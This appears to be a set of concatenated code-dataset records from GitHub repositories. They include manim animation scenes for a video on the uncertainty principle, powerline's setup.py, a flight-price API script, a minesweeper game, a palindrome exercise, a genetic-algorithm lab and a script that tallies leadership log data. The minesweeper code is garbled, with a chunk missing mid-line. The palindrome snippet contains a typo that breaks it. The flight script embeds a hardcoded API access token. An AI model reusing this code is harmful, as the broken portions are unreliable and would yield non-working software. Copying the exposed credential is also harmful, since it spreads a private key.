OldTex(\"\\\\big(\\\\big)\")\n parens.stretch(1.5, 1)\n parens.match_height(group)\n lp.next_to(group, LEFT, buff = SMALL_BUFF)\n rp.next_to(group, RIGHT, buff = SMALL_BUFF)\n group.add(parens)\n groups.add(group)\n arrow = OldTex(\"\\\\Leftrightarrow\").scale(2)\n groups.submobjects.insert(1, arrow)\n groups.arrange(RIGHT)\n groups.next_to(morty, UP+RIGHT, LARGE_BUFF)\n groups.shift_onto_screen()\n\n\n self.play(PiCreatureBubbleIntroduction(\n morty, \"Heisenberg \\\\\\\\ uncertainty \\\\\\\\ principle\",\n bubble_type = ThoughtBubble,\n bubble_config = {\"height\" : 4, \"width\" : 4, \"direction\" : RIGHT},\n target_mode = \"pondering\"\n ))\n self.wait()\n self.play(morty.change, \"confused\", dot_gdw)\n self.wait(10)\n self.play(\n ApplyMethod(\n VGroup(dot_gdw, vector_gdw ).shift, \n FRAME_X_RADIUS*RIGHT,\n rate_func = running_start\n )\n )\n self.remove(*continual_anims)\n self.play(\n morty.change, \"raise_left_hand\", groups,\n FadeIn(\n groups, \n lag_ratio = 0.5,\n run_time = 3,\n )\n )\n self.wait(2)\n\n# End things\n\nclass PatreonMention(PatreonThanks):\n def construct(self):\n morty = Mortimer()\n morty.next_to(ORIGIN, DOWN)\n\n patreon_logo = PatreonLogo()\n patreon_logo.to_edge(UP)\n\n thank_you = OldTexText(\"Thank you.\")\n thank_you.next_to(patreon_logo, DOWN)\n\n self.play(\n DrawBorderThenFill(patreon_logo),\n morty.change, \"gracious\"\n )\n self.play(Write(thank_you))\n self.wait(3)\n\nclass Promotion(PiCreatureScene):\n CONFIG = {\n \"camera_class\" : ThreeDCamera,\n \"seconds_to_blink\" : 5,\n }\n def construct(self):\n aops_logo = AoPSLogo()\n aops_logo.next_to(self.pi_creature, UP+LEFT)\n url = OldTexText(\n \"AoPS.com/\", \"3b1b\",\n arg_separator = \"\"\n )\n url.to_corner(UP+LEFT)\n url_rect = Rectangle(color = BLUE)\n url_rect.replace(\n url.get_part_by_tex(\"3b1b\"),\n stretch = True\n )\n\n url_rect.stretch_in_place(1.1, dim = 1)\n\n rect = Rectangle(height = 9, width = 16)\n rect.set_height(4.5)\n rect.next_to(url, DOWN)\n rect.to_edge(LEFT)\n rect.set_stroke(width = 0)\n mathy = Mathematician()\n mathy.flip()\n mathy.to_corner(DOWN+RIGHT)\n morty = self.pi_creature\n morty.save_state()\n book = ImageMobject(\"AoPS_volume_2\")\n book.set_height(2)\n book.next_to(mathy, UP+LEFT).shift(MED_LARGE_BUFF*LEFT)\n mathy.get_center = mathy.get_top\n\n words = OldTexText(\"\"\"\n Interested in working for \\\\\\\\ \n one of my favorite math\\\\\\\\ \n education companies?\n \"\"\", alignment = \"\")\n words.to_edge(UP)\n\n arrow = Arrow(\n aops_logo.get_top(),\n morty.get_top(),\n path_arc = -0.4*TAU,\n stroke_width = 5,\n tip_length = 0.5,\n )\n arrow.tip.shift(SMALL_BUFF*DOWN)\n\n self.add(words)\n self.play(\n self.pi_creature.change_mode, \"raise_right_hand\",\n *[\n DrawBorderThenFill(\n submob,\n run_time = 2,\n rate_func = squish_rate_func(double_smooth, a, a+0.5)\n )\n for submob, a in zip(aops_logo, np.linspace(0, 0.5, len(aops_logo)))\n ]\n )\n self.play(\n words.scale, 0.75,\n words.next_to, url, DOWN, LARGE_BUFF,\n words.shift_onto_screen,\n Write(url),\n )\n self.wait(2)\n self.play(\n LaggedStartMap(\n ApplyFunction, aops_logo,\n lambda mob : (lambda m : m.shift(0.2*UP).set_color(YELLOW), mob),\n rate_func = there_and_back, \n run_time = 1,\n ),\n morty.change, \"thinking\"\n )\n self.wait()\n self.play(ShowCreation(arrow))\n self.play(FadeOut(arrow))\n self.wait()\n\n # To teacher\n self.play(\n morty.change_mode, \"plain\",\n morty.flip,\n morty.scale, 0.7,\n morty.next_to, mathy, LEFT, LARGE_BUFF,\n morty.to_edge, DOWN,\n FadeIn(mathy),\n )\n self.play(\n PiCreatureSays(\n mathy, \"\",\n bubble_config = {\"width\" : 5},\n look_at = morty.eyes,\n ),\n morty.change, \"happy\",\n aops_logo.shift, 1.5*UP + 0.5*RIGHT\n )\n self.play(Blink(mathy))\n self.wait()\n self.play(\n RemovePiCreatureBubble(\n mathy, target_mode = \"raise_right_hand\"\n ),\n aops_logo.to_corner, UP+RIGHT,\n aops_logo.shift, MED_SMALL_BUFF*DOWN,\n GrowFromPoint(book, mathy.get_corner(UP+LEFT)),\n )\n self.play(morty.change, \"pondering\", book)\n self.wait(3)\n self.play(Blink(mathy))\n self.wait()\n self.play(\n Animation(\n BackgroundRectangle(book, fill_opacity = 1),\n remover = True\n ),\n FadeOut(book),\n )\n print(self.num_plays)\n self.play(\n FadeOut(words),\n ShowCreation(rect),\n morty.restore,\n morty.change, \"happy\", rect,\n FadeOut(mathy),\n )\n self.wait(10)\n self.play(ShowCreation(url_rect))\n self.play(\n FadeOut(url_rect),\n url.get_part_by_tex(\"3b1b\").set_color, BLUE,\n )\n self.wait(15)\n\nclass PuzzleStatement(Scene):\n def construct(self):\n aops_logo = AoPSLogo()\n url = OldTexText(\"AoPS.com/3b1b\")\n url.next_to(aops_logo, UP)\n group = VGroup(aops_logo, url)\n group.to_edge(UP)\n self.add(group)\n\n words = OldTexText(\"\"\"\n AoPS must choose one of 20 people to send to a \n tug-of-war tournament. We don't care who we send, \n as long as we don't send our weakest person. \\\\\\\\ \\\\\\\\\n\n Each person has a different strength, but we don't know \n those strengths. We get 10 intramural 10-on-10 matches \n to determine who we send. Can we make sure we don't send\n the weakest person?\n \"\"\", alignment = \"\")\n words.set_width(FRAME_WIDTH - 2)\n words.next_to(group, DOWN, LARGE_BUFF)\n self.play(LaggedStartMap(FadeIn, words, run_time = 5, lag_ratio = 0.2))\n self.wait(2)\n\nclass UncertaintyEndScreen(PatreonEndScreen):\n CONFIG = {\n \"specific_patrons\" : [\n \"CrypticSwarm\",\n \"Ali Yahya\",\n \"Juan Benet\",\n \"Markus Persson\",\n \"Damion Kistler\",\n \"Burt Humburg\",\n \"Yu Jun\",\n \"Dave Nicponski\",\n \"Kaustuv DeBiswas\",\n \"Joseph John Cox\",\n \"Luc Ritchie\",\n \"Achille Brighton\",\n \"Rish Kundalia\",\n \"Yana Chernobilsky\",\n \"Shìmín Kuang\",\n \"Mathew Bramson\",\n \"Jerry Ling\",\n \"Mustafa Mahdi\",\n \"Meshal Alshammari\",\n \"Mayank M. Mehrotra\",\n \"Lukas Biewald\",\n \"Robert Teed\",\n \"Samantha D. Suplee\",\n \"Mark Govea\",\n \"John Haley\",\n \"Julian Pulgarin\",\n \"Jeff Linse\",\n \"Cooper Jones\",\n \"Desmos \",\n \"Boris Veselinovich\",\n \"Ryan Dahl\",\n \"Ripta Pasay\",\n \"Eric Lavault\",\n \"Randall Hunt\",\n \"Andrew Busey\",\n \"Mads Elvheim\",\n \"Tianyu Ge\",\n \"Awoo\",\n \"Dr. David G. Stork\",\n \"Linh Tran\",\n \"Jason Hise\",\n \"Bernd Sing\",\n \"James H. Park\",\n \"Ankalagon \",\n \"Mathias Jansson\",\n \"David Clark\",\n \"Ted Suzman\",\n \"Eric Chow\",\n \"Michael Gardner\",\n \"David Kedmey\",\n \"Jonathan Eppele\",\n \"Clark Gaebel\",\n \"Jordan Scales\",\n \"Ryan Atallah\",\n \"supershabam \",\n \"1stViewMaths\",\n \"Jacob Magnuson\",\n \"Chloe Zhou\",\n \"Ross Garber\",\n \"Thomas Tarler\",\n \"Isak Hietala\",\n \"Egor Gumenuk\",\n \"Waleed Hamied\",\n \"Oliver Steele\",\n \"Yaw Etse\",\n \"David B\",\n \"Delton Ding\",\n \"James Thornton\",\n \"Felix Tripier\",\n \"Arthur Zey\",\n \"George Chiesa\",\n \"Norton Wang\",\n \"Kevin Le\",\n \"Alexander Feldman\",\n \"David MacCumber\",\n \"Jacob Kohl\",\n \"Frank Secilia\",\n \"George John\",\n \"Akash Kumar\",\n \"Britt Selvitelle\",\n \"Jonathan Wilson\",\n \"Michael Kunze\",\n \"Giovanni Filippi\",\n \"Eric Younge\",\n \"Prasant Jagannath\",\n \"Andrejs olins\",\n \"Cody Brocious\",\n ],\n }\n\nclass Thumbnail(Scene):\n def construct(self):\n uncertainty_principle = OldTexText(\"Uncertainty \\\\\\\\\", \"principle\")\n uncertainty_principle[1].shift(SMALL_BUFF*UP)\n quantum = OldTexText(\"Quantum\")\n VGroup(uncertainty_principle, quantum).scale(2.5)\n uncertainty_principle.to_edge(UP, MED_LARGE_BUFF)\n quantum.to_edge(DOWN, MED_LARGE_BUFF)\n\n arrow = OldTex(\"\\\\Downarrow\")\n arrow.scale(4)\n arrow.move_to(Line(\n uncertainty_principle.get_bottom(),\n quantum.get_top(),\n ))\n\n cross = Cross(arrow)\n cross.set_stroke(RED, 20)\n\n is_word, not_word = is_not = OldTexText(\"is\", \"\\\\emph{NOT}\")\n is_not.scale(3)\n is_word.move_to(arrow)\n # is_word.shift(0.6*UP)\n not_word.set_color(RED)\n not_word.set_stroke(RED, 3)\n not_word.rotate(10*DEGREES, about_edge = DOWN+LEFT)\n not_word.next_to(is_word, DOWN, 0.1*SMALL_BUFF)\n\n dot_cloud = ProbabalisticDotCloud(\n n_copies = 1000,\n )\n dot_gdw = dot_cloud.gaussian_distribution_wrapper\n # dot_gdw.rotate(3*DEGREES)\n dot_gdw.rotate(25*DEGREES)\n # dot_gdw.scale(2)\n dot_gdw.scale(2)\n # dot_gdw.move_to(quantum.get_bottom()+SMALL_BUFF*DOWN)\n dot_gdw.move_to(quantum)\n\n\n\n def get_func(a):\n return lambda t : 0.5*np.exp(-a*t**2)*np.cos(TAU*t)\n axes = Axes(\n x_min = -6, x_max = 6,\n x_axis_config = {\"unit_size\" : 0.25}\n )\n graphs = VGroup(*[\n axes.get_graph(get_func(a))\n for a in (10, 3, 1, 0.3, 0.1,)\n ])\n graphs.arrange(DOWN, buff = 0.6)\n graphs.to_corner(UP+LEFT)\n graphs.set_color_by_gradient(BLUE_B, BLUE_D)\n\n frequency_axes = Axes(\n x_min = 0, x_max = 2,\n x_axis_config = {\"unit_size\" : 1}\n )\n fourier_graphs = VGroup(*[\n get_fourier_graph(\n frequency_axes, graph.underlying_function,\n t_min = -10, t_max = 10,\n )\n for graph in graphs\n ])\n for graph, fourier_graph in zip(graphs, fourier_graphs):\n fourier_graph.pointwise_become_partial(fourier_graph, 0.02, 0.06)\n fourier_graph.scale(3)\n fourier_graph.stretch(3, 1)\n fourier_graph.move_to(graph)\n fourier_graph.to_edge(RIGHT)\n\n self.add(graphs, fourier_graphs)\n\n\n self.add(dot_cloud)\n self.add(\n uncertainty_principle, quantum,\n )\n self.add(arrow, cross)\n # self.add(is_word)\n # self.add(is_not)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"3b1b/videos","sub_path":"_2018/uncertainty.py","file_name":"uncertainty.py","file_ext":"py","file_size_in_byte":152993,"program_lang":"python","lang":"en","doc_type":"code","stars":5003,"dataset":"github-code","pt":"67"} +{"seq_id":"16934175838","text":"#!/usr/bin/env python\n# vim:fileencoding=utf-8:noet\nfrom __future__ import (unicode_literals, division, absolute_import, print_function)\n\nimport os\nimport sys\nimport logging\nimport shlex\nimport subprocess\n\nfrom setuptools import setup, find_packages\n\nfrom powerline.version import get_version\n\nCURRENT_DIR = os.path.abspath(os.path.dirname(__file__))\ntry:\n\tREADME = open(os.path.join(CURRENT_DIR, 'README.rst'), 'rb').read().decode('utf-8')\nexcept IOError:\n\tREADME = ''\n\nOLD_PYTHON = sys.version_info < (2, 7)\n\n\ndef compile_client():\n\t'''Compile the C powerline-client script.'''\n\n\tif hasattr(sys, 'getwindowsversion'):\n\t\traise NotImplementedError()\n\telse:\n\t\tfrom distutils.ccompiler import new_compiler\n\t\tcompiler = new_compiler().compiler\n\t\tcflags = os.environ.get('CFLAGS', str('-O3'))\n\t\t# A normal split would do a split on each space which might be incorrect. The\n\t\t# shlex will not split if a space occurs in an arguments value.\n\t\tsubprocess.check_call(compiler + shlex.split(cflags) + ['client/powerline.c', '-o', 'scripts/powerline'])\n\ntry:\n\tcompile_client()\nexcept Exception as e:\n\tprint('Compiling C version of powerline-client failed')\n\tlogging.exception(e)\n\t# FIXME Catch more specific exceptions\n\timport shutil\n\tif hasattr(shutil, 'which'):\n\t\twhich = shutil.which\n\telse:\n\t\tsys.path.append(CURRENT_DIR)\n\t\tfrom powerline.lib.shell import which\n\tcan_use_scripts = True\n\tif which('socat') and which('sed') and which('sh'):\n\t\tprint('Using powerline.sh script instead of C version (requires socat, sed and sh)')\n\t\tshutil.copyfile('client/powerline.sh', 'scripts/powerline')\n\telse:\n\t\tprint('Using powerline.py script instead of C version')\n\t\tshutil.copyfile('client/powerline.py', 'scripts/powerline')\nelse:\n\tcan_use_scripts = False\n\nsetup(\n\tname='powerline-status',\n\tversion=get_version(),\n\tdescription='The ultimate statusline/prompt utility.',\n\tlong_description=README,\n\tclassifiers=[\n\t\t'Development Status :: 4 - Beta',\n\t\t'Environment :: Console',\n\t\t'Environment :: Plugins',\n\t\t'Intended Audience :: End Users/Desktop',\n\t\t'License :: OSI Approved :: MIT License',\n\t\t'Natural Language :: English',\n\t\t'Operating System :: Microsoft :: Windows',\n\t\t'Operating System :: POSIX',\n\t\t'Programming Language :: Python :: 3.6',\n\t\t'Programming Language :: Python :: 3.7',\n\t\t'Programming Language :: Python :: 3.8',\n\t\t'Programming Language :: Python :: 3.9',\n\t\t'Programming Language :: Python :: Implementation :: CPython',\n\t\t'Programming Language :: Python :: Implementation :: PyPy',\n\t],\n\tdownload_url='https://github.com/powerline/powerline/archive/develop.zip',\n\tauthor='Kim Silkebaekken',\n\tauthor_email='kim.silkebaekken+vim@gmail.com',\n\turl='https://github.com/powerline/powerline',\n\tlicense='MIT',\n\t# XXX Python 3 doesn’t allow compiled C files to be included in the scripts\n\t# list below. This is because Python 3 distutils tries to decode the file to\n\t# ASCII, and fails when powerline-client is a binary.\n\t#\n\t# XXX Python 2 fucks up script contents*. Not using it to install scripts\n\t# any longer.\n\t# * Consider the following input:\n\t# % alias hex1=$'hexdump -e \\'\"\" 1/1 \"%02X\\n\"\\''\n\t# % diff <(hex1 ./scripts/powerline) <(hex1 ~/.local/bin/powerline)\n\t# This will show output like\n\t# 375c375\n\t# < 0D\n\t# ---\n\t# > 0A\n\t# (repeated, with diff segment header numbers growing up).\n\t#\n\t# FIXME Current solution does not work with `pip install -e`. Still better\n\t# then solution that is not working at all.\n\tscripts=[\n\t\t'scripts/powerline-lint',\n\t\t'scripts/powerline-daemon',\n\t\t'scripts/powerline-render',\n\t\t'scripts/powerline-config',\n\t] + (['scripts/powerline'] if can_use_scripts else []),\n\tdata_files=(None if can_use_scripts else (('bin', ['scripts/powerline']),)),\n\tkeywords='',\n\tpackages=find_packages(exclude=('tests', 'tests.*')),\n\tinclude_package_data=True,\n\tzip_safe=False,\n\tinstall_requires=['argparse'] if OLD_PYTHON else [],\n\textras_require={\n\t\t'docs': [\n\t\t\t'Sphinx',\n\t\t\t'sphinx_rtd_theme',\n\t\t],\n\t},\n\ttest_suite='tests' if not OLD_PYTHON else None,\n)\n","repo_name":"powerline/powerline","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":13989,"dataset":"github-code","pt":"67"} +{"seq_id":"18040648094","text":"import requests\nimport json\n \nurl = \"https://api.travelpayouts.com/v2/prices/month-matrix\"\n \nquerystring = {\"currency\":\"usd\",\"show_to_affiliates\":\"true\",\"origin\":\"LED\",\"destination\":\"HKT\"}\n \nheaders = {'x-access-token': '2160a9f9ca2fa3d348f4a3a32504538e'}\n \nresponse = requests.request(\"GET\", url, headers=headers, params=querystring)\n \n#store the input and load it into a dictionary using the loads function\njson_input = json.loads(response.text)\n\n#extract the list at key pair data in the dictionary\ndata_list = json_input[\"data\"]\n\n#create 2 empty stacks to store data to later return\nlessThan650 = []\ngreaterThan650 = []\n\n#traverse through the list in the extracted earlier\nfor i in range(0, len(data_list)):\n #check for less than 650 at value key pair\n if (int(data_list[i][\"value\"]) <= 650):\n #populate stack with valid dictionary from list\n lessThan650.append(data_list[i])\n #check for greater than 650 at value key pair\n if (int(data_list[i][\"value\"]) > 650):\n #populate stack with valid dictionary from list\n greaterThan650.append(data_list[i])\n\n#Generate a menu for user input to select what option they want\nrunning = True\nwhile (running):\n userInput = input(\"Enter 0 if you would like to see the flights less than 650 \\nEnter 1 if you would like flights for more than 650\\nEnter anything else to exit code:\")\n if userInput == '0':\n print(lessThan650, \"\\n\\n\")\n if userInput == '1':\n print(greaterThan650, \"\\n\\n\")\n if userInput != '0' and userInput != '1':\n print(\"\\n\\nExiting code\")\n running = False\n\n","repo_name":"HappyStackRiver/Kura","sub_path":"Python_Scripts/practiceDictionaries.py","file_name":"practiceDictionaries.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23588458359","text":"import random\r\nclicks=0\r\nclass block:\r\n\r\n def __init__(self, x):\r\n self.position=x\r\n self.opened = 0\r\n self.bomb = 0\r\n def update(self):\r\n global clicks\r\n if self.opened==0:\r\n pygame.draw.rect(s,(255,0,0),(((self.position)%n)*50,((self.position)//n)*50,50,50))\r\n pygame.draw.rect(s, (0, 0, 0), (((self.position) % n) * 50, ((self.position) // n) * 50, 50, 50),2)\r\n else:\r\n pygame.draw.rect(s, (0, 255, 0), (((self.position) % n) * 50, ((self.position) // n) * 50, 50, 50))\r\n pygame.draw.rect(s, (0, 0, 0), (((self.position) % n) * 50, ((self.position) // n) * 50, 50, 50), 2)\r\n distext=0\r\n if self.bomb==-1:\r\n distext=-1\r\n print(\"game over u lost\")\r\n pygame.quit()\r\n quit()\r\n else:\r\n to_check=[]\r\n lb,rb,ub,db=0,0,0,0\r\n if (self.position+1)//n ==(self.position)//n:\r\n to_check.append(self.position+1)\r\n rb=1\r\n if (self.position - 1) // n == (self.position) // n:\r\n to_check.append(self.position - 1)\r\n lb=1\r\n if (self.position -n)>=0:\r\n to_check.append(self.position -n)\r\n ub=1\r\n if (self.position +n)number_of_bombs:\r\n bomblist=random.sample(range(0, n*n), number_of_bombs)\r\n for jj in bomblist:\r\n l[jj].bomb=-1\r\nelse:\r\n l[0].bomb=-1\r\nwhile(1):\r\n for i in pygame.event.get():\r\n if i.type==12:\r\n pygame.quit()\r\n quit()\r\n if i.type==pygame.MOUSEBUTTONDOWN:\r\n if i.button==1:\r\n x,y=i.pos\r\n x=x//50\r\n y=y//50\r\n mousepos=y*n+x\r\n if l[mousepos].opened==0:\r\n l[mousepos].opened=1\r\n l[mousepos].update()\r\n pygame.display.update()\r\n elif i.button==3:\r\n x,y=i.pos\r\n x=(x//50)*50\r\n y=(y//50)*50\r\n texts = text.render(\"FL\", True, (0, 0, 0))\r\n s.blit(texts, (x+10,y) )\r\n pygame.display.update()\r\n","repo_name":"MrMadFox/minesweeper","sub_path":"mine.py","file_name":"mine.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32388930478","text":"# string=\"aabaa\"\n# length = 5\n# length // 2\n# if string[::-1]==string:\n# print(\"true\")\n# else:\n# print(\"False\")\n\n# print(True if string == string[::-1] else False)\n\n# # do using for loop\n# n=len(string)\n# flag = 0\n# for i in range (n):\n# if string[n-i-c1] == string[i]:\n# pass\n# else:\n# print(False)\n# flag = 1\n# break\n\n# if flag == 0:\n# print(True)\nstring=\"aabaaa\"\nn=len(string)\ni = 0\nj = n-1\nwhile i mutation_rate:\n return chromosome\n\n gene_index = np.random.randint(0, len(chromosome) - 1)\n chromosome = list(chromosome)\n chromosome[gene_index] = '1' if chromosome[gene_index] == '0' else '0'\n return ''.join(chromosome)\n\n\ndef select(population):\n return np.random.choice(population)\n\n\ndef nextGen():\n new_population = []\n # sorted_population = sort_population_by_fitness(population)\n\n for i in range(0, len(population), 2):\n a = population[i]\n b = population[i + 1]\n\n point = np.random.randint(1, len(a) - 2)\n\n result_a = a[:point] + b[point:]\n result_b = b[:point] + a[point:]\n\n result_a = mutate(result_a)\n result_b = mutate(result_b)\n\n new_population.append(result_a)\n new_population.append(result_b)\n\n return new_population\n\n\ndef f_plot():\n x = np.linspace(x_min, x_max, int(N))\n y = f(x)\n plt.plot(x, y)\n plt.show()\n\n\nf_plot()\n\nX = x_min\ncount = 0\nwhile X <= x_max + E:\n s = encode(X)\n print('X =', X, ' Nx =', s, ' Nxr =', decode(s), ' f(X) = ', f(X))\n X += E\n count += 1\nprint(count)\n\n# init population\npopulation_size = 20\npopulation = [encode(np.random.uniform(x_min, x_max)) for i in range(population_size)]\n\nfor i in range(100):\n print('Population #' + str(i))\n print(population)\n print('\\n')\n\n population = nextGen()\n\nprint('true max: (', 2, ',', 9.1543, ')')\nprint('true min: (', -0.630761, ',', -0.499236, ')')\n\nx = decode(sort_population_by_fitness(population)[-1])\ny = f(x)\n\nprint('max: (', x, ',', y, ')')\n\nx = decode(sort_population_by_fitness(population)[0])\ny = f(x)\n\nprint('min: (', x, ',', y, ')')\n","repo_name":"CyanoFresh/KPI-Labs","sub_path":"AI/lab3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4197488379","text":"import csv\nimport os\nimport json\n\ndef get_args():\n n_agent = 4\n n, k, p = 5, 3, 7\n t, ts = 8, 2\n exp_name = \"20190104-014057\"\n exp_id = \"exp0\"\n return n_agent, n, k, p, t, ts, exp_name, exp_id\n\ndef get_file_path(n_agent, n, k, p, t, ts, exp_name, exp_id):\n args_str = \"NA{}_N{}_K{}_P{}_T{}_Ts{}\".format(n_agent, n, k, p, t, ts)\n exp_dir = os.path.join(\"..\", \"..\", \"result\",\n \"batch_{exp_name}_{args_str}\",\n \"mul_{exp_name}_{exp_id}\").format(exp_name=exp_name,\n args_str=args_str,\n exp_id=exp_id)\n input_json_name = \"mul_{exp_name}_{exp_id}_leadership_bill.json\".format(exp_name=exp_name, exp_id=exp_id)\n output_csv_name = \"mul_{exp_name}_{exp_id}_leadership_bill.csv\".format(exp_name=exp_name, exp_id=exp_id)\n output_sum_csv_name = \"mul_{exp_name}_{exp_id}_leadership_bill_sum.csv\".format(exp_name=exp_name, exp_id=exp_id)\n output_stage_csv_name = \"mul_{exp_name}_{exp_id}_leadership_bill_stage.csv\".format(exp_name=exp_name, exp_id=exp_id)\n args = {\n \"input_json_path\": os.path.join(exp_dir, input_json_name),\n \"output_csv_path\": os.path.join(exp_dir, output_csv_name),\n \"output_sum_csv_path\": os.path.join(exp_dir, output_sum_csv_name),\n \"output_stage_csv_path\": os.path.join(exp_dir, output_stage_csv_name),\n \"agent_num\": n_agent, \"T\": t, \"Ts\": ts\n }\n return args\n\n\ndef get_walk_funcs():\n def func_fatory(assert_lists):\n def _f(jd_list, time, agent_id):\n ret_num = len(jd_list)\n for jd in jd_list:\n for asst in assert_lists:\n if not asst(jd, time, agent_id):\n ret_num -= 1\n break\n return ret_num\n\n return _f\n\n def sum_func_fatory(func_list):\n def _f(jd_list, time, agent_id):\n return sum([func(jd_list, time, agent_id) for func in func_list])\n\n return _f\n\n assert_lists = {\n 'm-plan': [\n lambda jd, ti, id: jd['record_type'] == 'm-plan',\n lambda jd, ti, id: jd['gen']['time'] == ti,\n lambda jd, ti, id: jd['gen']['person'] == id,\n lambda jd, ti, id: jd['gen']['act'] != 'start'\n ],\n 'm-info': [\n lambda jd, ti, id: jd['record_type'] == 'm-info',\n lambda jd, ti, id: jd['gen']['time'] == ti,\n lambda jd, ti, id: jd['gen']['person'] == id,\n lambda jd, ti, id: jd['gen']['act'] != 'start'\n ],\n 'talking-whlj': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'whlj',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-dyjs': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'dyjs',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-m-req-xxjl': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'meet_req',\n lambda jd, ti, id: jd['meeting'] == 'xxjl',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-m-req-xtfg': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'meet_req',\n lambda jd, ti, id: jd['meeting'] == 'xtfg',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-m-req-tljc': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'meet_req',\n lambda jd, ti, id: jd['meeting'] == 'tljc',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-get-plan': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'get_a_plan',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-commit': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'commit_plan',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ],\n 'talking-get_useful_info': [\n lambda jd, ti, id: jd['record_type'] == 'talking',\n lambda jd, ti, id: jd['talking_type'] == 'get_useful_info',\n lambda jd, ti, id: jd['speaker']['time'] == ti,\n lambda jd, ti, id: jd['speaker']['person'] == id,\n lambda jd, ti, id: jd['speaker']['person'] != jd['listener']['person']\n ]\n }\n walk_funcs = {asst_name: func_fatory(assert_lists[asst_name]) for asst_name in assert_lists}\n walk_funcs['adapt_sig'] = sum_func_fatory([walk_funcs['m-plan'], walk_funcs['m-info']])\n walk_funcs['adapt_impact'] = sum_func_fatory(\n [walk_funcs['talking-get_useful_info'], walk_funcs['talking-get-plan']])\n walk_funcs['admin_impact'] = sum_func_fatory([walk_funcs['talking-m-req-xtfg'], walk_funcs['talking-commit']])\n walk_funcs['relat_enable_impact'] = sum_func_fatory([walk_funcs['talking-whlj'], walk_funcs['talking-dyjs']])\n walk_funcs['info_enable_impact'] = sum_func_fatory(\n [walk_funcs['talking-m-req-xxjl'], walk_funcs['talking-m-req-tljc']])\n return walk_funcs\n\n\ndef fill_tabel_by_json(input_json, args):\n n_agent = args['agent_num']\n total_t = args['T']\n walk_funcs = get_walk_funcs()\n\n def json_list_key_select(jdata, key, value):\n def _dfs(the_jd):\n for k in the_jd:\n if k == key and the_jd[k] == value:\n return True\n elif isinstance(the_jd[k], dict) and _dfs(the_jd[k]):\n return True\n return False\n\n return [jd for jd in jdata if _dfs(jd)]\n\n title = ['T', 'agent_no'] + [func_name for func_name in walk_funcs]\n ret_table = []\n for ti in range(total_t):\n t_split_json = json_list_key_select(input_json, 'time', ti)\n for agent_i in range(n_agent):\n t_a_split_json = json_list_key_select(t_split_json, 'person', agent_i)\n new_row = {'T': ti, 'agent_no': agent_i}\n for func_name in walk_funcs:\n func = walk_funcs[func_name]\n new_row[func_name] = func(t_a_split_json, ti, agent_i)\n ret_table.append(new_row)\n return ret_table, title\n\n\ndef calc_output_sum(csv_table, title, args):\n n_agent = args['agent_num']\n total_t = args['T']\n\n def row_i(ti, ai):\n return ti * n_agent + ai\n\n sum_table = []\n for ti in range(total_t):\n for ai in range(n_agent):\n new_row = {'T': ti, 'agent_no': ai}\n for k in title:\n if k == 'T' or k == 'agent_no':\n continue\n new_row[k] = csv_table[row_i(ti, ai)][k]\n new_row[k] += sum_table[row_i(ti - 1, ai)][k] if ti > 0 else 0\n sum_table.append(new_row)\n return sum_table\n\n\ndef calc_output_stage(csv_table, title, args):\n n_agent = args['agent_num']\n total_t = args['T']\n ts = args['Ts']\n stage_n = total_t // ts\n\n def row_i(ti, ai):\n return ti * n_agent + ai\n\n stage_table = []\n for si in range(stage_n):\n for ai in range(n_agent):\n new_row = {'T': (si + 1) * ts - 1, 'agent_no': ai}\n for k in title:\n if k == 'T' or k == 'agent_no':\n continue\n new_row[k] = sum([csv_table[row_i(ti, ai)][k] for ti in range(si * ts, (si + 1) * ts)])\n stage_table.append(new_row)\n return stage_table\n\n\ndef main(args):\n input_json_path = args['input_json_path']\n output_csv_path = args['output_csv_path']\n output_sum_csv_path = args['output_sum_csv_path']\n output_stage_csv_path = args['output_stage_csv_path']\n\n with open(input_json_path, \"r\") as fp:\n input_json = json.load(fp)\n\n output_csv_table, output_title = fill_tabel_by_json(input_json, args)\n output_sum_csv_table = calc_output_sum(output_csv_table, output_title, args)\n output_stage_csv_table = 